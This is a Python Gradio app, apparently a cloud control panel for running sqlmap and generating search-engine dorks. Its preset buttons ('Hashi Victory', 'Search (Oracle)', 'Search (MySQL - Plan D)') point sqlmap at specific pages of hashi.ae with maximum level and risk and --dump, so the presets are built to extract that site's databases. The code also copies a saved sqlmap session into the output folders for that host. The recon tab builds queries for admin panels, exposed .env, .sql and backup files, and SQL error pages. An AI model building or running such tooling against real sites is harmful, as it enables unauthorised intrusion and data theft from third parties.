| import gradio as gr |
| import subprocess |
| import os |
| import shutil |
| from pathlib import Path |
|
|
| |
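def restore_session():
    """Copy ``session.sqlite`` from the working directory into sqlmap's output tree.

    The file is copied into the two hard-coded per-host directories
    (``hashi.ae`` and ``www.hashi.ae``) under
    ``/root/.local/share/sqlmap/output``; missing directories are created.

    Returns:
        A one-line status string: success, a warning carrying the OS error
        text, or a notice that no session file exists.
    """
    session_source = Path("session.sqlite")
    output_root = Path("/root/.local/share/sqlmap/output")
    target_base = output_root / "hashi.ae"
    target_www = output_root / "www.hashi.ae"

    if not session_source.exists():
        return "βΉοΈ No session file found in repository."

    try:
        # Both host spellings get the same file, so one loop covers them.
        for target_dir in (target_base, target_www):
            target_dir.mkdir(parents=True, exist_ok=True)
            shutil.copy(session_source, target_dir / "session.sqlite")
    except OSError as e:
        # mkdir() and shutil.copy() report failures as OSError subclasses;
        # a failed copy is reported to the caller instead of aborting the run.
        return f"β οΈ Session restore warning: {e}"

    # The success literal was split across two lines on the page (unterminated
    # string); it is restored to a single-line literal here.
    return f"✅ Victory Session Injected into {target_base}"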
|
|
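def run_sqlmap(url, threads, level, risk, tamper, techn, proxy, extra_args):
    """Run sqlmap against ``url`` and stream its combined stdout/stderr.

    Generator used as a Gradio click handler: the accumulated log is yielded
    again after every new output line, followed by a final status line.

    Args:
        url: Target URL; must be an absolute http(s) URL.
        threads, level, risk: Numeric values passed to ``--threads``,
            ``--level`` and ``--risk`` after conversion with ``int``.
        tamper, techn, proxy: Optional values for ``--tamper``,
            ``--technique`` and ``--proxy``; skipped when empty.
        extra_args: Optional free-form option string, tokenised with
            ``shlex.split``.

    Yields:
        The text to display in the log widget.
    """
    # Function-scope imports keep this block self-contained.
    import shlex
    from urllib.parse import urlsplit

    session_status = restore_session()

    url = (url or "").strip()
    if not url:
        yield f"{session_status}\nβ Error: Target URL is required."
        return

    # Every field arrives from the web form. Requiring an absolute http(s)
    # URL keeps a value that starts with "-" from being parsed by sqlmap as
    # an option instead of as the argument of -u.
    try:
        parsed = urlsplit(url)
    except ValueError:
        parsed = None
    if parsed is None or parsed.scheme not in ("http", "https") or not parsed.netloc:
        yield f"{session_status}\nβ Error: Target URL must be an absolute http(s) URL."
        return

    try:
        cmd = [
            "python3", "/app/sqlmap-dev/sqlmap.py", "-u", url, "--batch",
            "--threads", str(int(threads)),
            "--level", str(int(level)),
            "--risk", str(int(risk)),
        ]
        # shlex.split honours quoting, so an option value may contain spaces;
        # unbalanced quotes raise ValueError and are reported below.
        extra_tokens = shlex.split(extra_args) if extra_args else []
    except (TypeError, ValueError) as e:
        yield f"{session_status}\nβ Error: invalid option value: {e}"
        return

    for flag, value in (("--tamper", tamper), ("--technique", techn), ("--proxy", proxy)):
        if value:
            cmd += [flag, value]

    # NOTE(review): extra_tokens are appended unfiltered, so the form can pass
    # any sqlmap option, including ones that act on the host running this
    # process rather than on the target. An allow-list of permitted options
    # belongs here.
    cmd += extra_tokens

    yield f"{session_status}\nπ Launching SQLMAP Cloud Runner...\nπ°οΈ Command: {' '.join(cmd)}\n\n"

    process = None
    try:
        # The argument list is passed without a shell, so no shell
        # metacharacter in a form field is interpreted.
        process = subprocess.Popen(
            cmd,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            text=True,
            bufsize=1,
        )

        full_log = ""
        for line in process.stdout:
            full_log += line
            yield full_log

        process.wait()
        if process.returncode == 0:
            # This literal was split across two lines on the page
            # (unterminated string); restored to one line.
            yield full_log + "\n✅ Scan completed successfully."
        else:
            yield full_log + f"\nβ οΈ Scan stopped with return code {process.returncode}."

    except Exception as e:
        yield f"β Fatal Error: {str(e)}"
    finally:
        # Runs when the generator is closed early (client disconnect or
        # cancelled event) as well as on normal exit, so the child process is
        # never left running without a reader.
        if process is not None:
            if process.poll() is None:
                process.terminate()
                try:
                    process.wait(timeout=5)
                except subprocess.TimeoutExpired:
                    process.kill()
                    process.wait()
            if process.stdout is not None:
                process.stdout.close()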
|
|
| |
def set_hashi_victory():
    """Return the form values loaded by the "Hashi Victory" preset button.

    The tuple order matches the scan form: URL, threads, level, risk,
    tamper, technique, proxy, extra arguments.
    """
    target_url = "https://hashi.ae/shop/page/4/?add-to-cart=638"
    threads, level, risk = 10, 5, 3
    tamper, technique, proxy = "", "U", ""
    extra = "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast"
    return (target_url, threads, level, risk, tamper, technique, proxy, extra)
|
|
def set_search_attack():
    """Return the form values loaded by the "Search (Oracle)" preset button.

    The tuple order matches the scan form: URL, threads, level, risk,
    tamper, technique, proxy, extra arguments.
    """
    target_url = "https://hashi.ae/?s=iphone"
    threads, level, risk = 10, 5, 3
    tamper, technique, proxy = "space2comment", "BEU", ""
    extra = "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast"
    return (target_url, threads, level, risk, tamper, technique, proxy, extra)
|
|
def set_mysql_attack():
    """Return the form values loaded by the "Search (MySQL - Plan D)" preset button.

    Same fields as the Oracle search preset; only the extra-argument string
    differs (``--dbms=MySQL``, no ``--unstable``).
    """
    target_url = "https://hashi.ae/?s=iphone"
    threads, level, risk = 10, 5, 3
    tamper, technique, proxy = "space2comment", "BEU", ""
    extra = "--dbms=MySQL --dump --force-ssl --random-agent --no-cast"
    return (target_url, threads, level, risk, tamper, technique, proxy, extra)
|
|
| |
def generate_dorks(domain, targeted_extensions, find_admin, find_files, find_errors):
    """Build newline-separated search-engine queries for the recon tab.

    Args:
        domain: Domain used for the ``site:`` scope; when empty the scope is
            left blank and each query keeps its remaining operators.
        targeted_extensions: Optional comma-separated file extensions added
            to the built-in list; blank entries are ignored.
        find_admin: Include the ``inurl:`` queries for login/admin paths.
        find_files: Include the ``ext:`` queries and the directory-listing
            query.
        find_errors: Include the ``intext:`` queries for database error text.

    Returns:
        All selected queries joined with ``"\\n"``; an empty string when no
        category is selected.
    """
    scope = f"site:{domain}" if domain else ""
    lines = []

    if find_admin:
        lines.extend(
            f"Admin Search: {scope} inurl:{word}"
            for word in ("admin", "login", "dashboard", "portal", "cpanel", "wp-admin")
        )

    if find_files:
        suffixes = ["env", "log", "sql", "bak", "txt", "config"]
        if targeted_extensions:
            suffixes.extend(targeted_extensions.split(","))
        for raw in suffixes:
            name = raw.strip()
            if name:
                lines.append(f"File Exposure ({name}): {scope} ext:{name}")
        # The directory-listing query carries no category label.
        lines.append(f'{scope} intitle:"index of"')

    if find_errors:
        for fragment in ("SQL syntax", "warning: mysql_", "unclosed quotation mark", "syntax error"):
            lines.append(f'Error Leak: {scope} intext:"{fragment}"')

    return "\n".join(lines)
|
|
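# Gradio UI: one tab that drives run_sqlmap and one that drives generate_dorks.
# NOTE(review): the page carries no indentation, so the container nesting below
# is reconstructed from the widget order - confirm against the rendered layout.
with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo:
    gr.Markdown("# π SLMP Cloud Runner v2.0 - Ultra Speed π©οΈ")
    gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth. Now includes Alpha Recon Studio.")

    with gr.Tabs():

        with gr.TabItem("βοΈ Attack Runner"):
            with gr.Row():
                # Left column: scan form and buttons.
                with gr.Column(scale=2):
                    url_input = gr.Textbox(label="π― Target URL", placeholder="https://example.com/page.php?id=1")

                    with gr.Tabs():
                        with gr.TabItem("π Performance"):
                            with gr.Row():
                                threads_input = gr.Slider(minimum=1, maximum=10, step=1, value=10, label="Threads")
                                level_input = gr.Slider(minimum=1, maximum=5, step=1, value=5, label="Level")
                                risk_input = gr.Slider(minimum=1, maximum=3, step=1, value=3, label="Risk")

                        with gr.TabItem("π‘οΈ Advanced"):
                            tamper_input = gr.Textbox(label="π§ͺ Tampers", placeholder="space2comment,randomcase")
                            techn_input = gr.Textbox(label="π‘ Technique", placeholder="U (UNION), B (Blind), etc.")
                            proxy_input = gr.Textbox(label="π Proxy (Optional)", placeholder="http://127.0.0.1:8080")
                            extra_input = gr.Textbox(label="βοΈ Extra Arguments", placeholder="--dbms=Oracle --dump --batch")

                    with gr.Row():
                        btn_run = gr.Button("π₯ START SCAN", variant="primary")
                    with gr.Row():
                        btn_hashi = gr.Button("π° Hashi Victory", variant="secondary")
                        btn_search = gr.Button("π Search (Oracle)", variant="stop")
                        btn_mysql = gr.Button("π¬ Search (MySQL - Plan D)", variant="secondary")
                        btn_stop = gr.Button("π STOP", variant="stop")

                # Right column: streamed log output.
                with gr.Column(scale=3):
                    output_log = gr.Code(label="π LIVE CLOUD LOGS", language="markdown", interactive=False, lines=30)

        # This tab label was split across two lines on the page (unterminated
        # string); restored to a single-line literal.
        with gr.TabItem("🦅 Alpha Recon Studio"):
            with gr.Row():
                with gr.Column():
                    domain_input = gr.Textbox(label="Target Domain", placeholder="example.com")
                    ext_input = gr.Textbox(label="Custom Extensions", placeholder="jsp, php, asp")

                    with gr.Group():
                        check_admin = gr.Checkbox(label="Find Admin Panels", value=True)
                        check_files = gr.Checkbox(label="Find Sensitive Files", value=True)
                        check_errors = gr.Checkbox(label="Find SQL Errors", value=True)

                    btn_gen = gr.Button("π Generate Recon Dorks", variant="primary")

                with gr.Column():
                    dork_output = gr.Code(label="Generated Dorks", language="text", lines=20)

    # The eight scan-form components, in the positional order run_sqlmap takes
    # them and the preset functions return them.
    scan_fields = [url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input]

    # Every value in scan_fields is client-supplied and reaches a subprocess
    # argument list through run_sqlmap.
    run_event = btn_run.click(run_sqlmap, inputs=scan_fields, outputs=output_log, queue=True)
    btn_hashi.click(set_hashi_victory, outputs=scan_fields)
    btn_search.click(set_search_attack, outputs=scan_fields)
    btn_mysql.click(set_mysql_attack, outputs=scan_fields)

    # The STOP button had no handler at all; cancelling the running scan
    # event closes the run_sqlmap generator.
    btn_stop.click(fn=None, inputs=None, outputs=None, cancels=[run_event])

    btn_gen.click(generate_dorks, inputs=[domain_input, ext_input, check_admin, check_files, check_errors], outputs=dork_output)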
|
|
if __name__ == "__main__":
    # Script entry point: announce start-up, then serve the queued Blocks app.
    # NOTE(review): server_name="0.0.0.0" listens on every interface and
    # launch() is given no auth=, so any client that can reach port 7860 can
    # trigger the click handlers, including the one that spawns a subprocess.
    print("β¨ SLMP Panel Live.")
    app = demo.queue()
    app.launch(server_name="0.0.0.0", server_port=7860)
|
|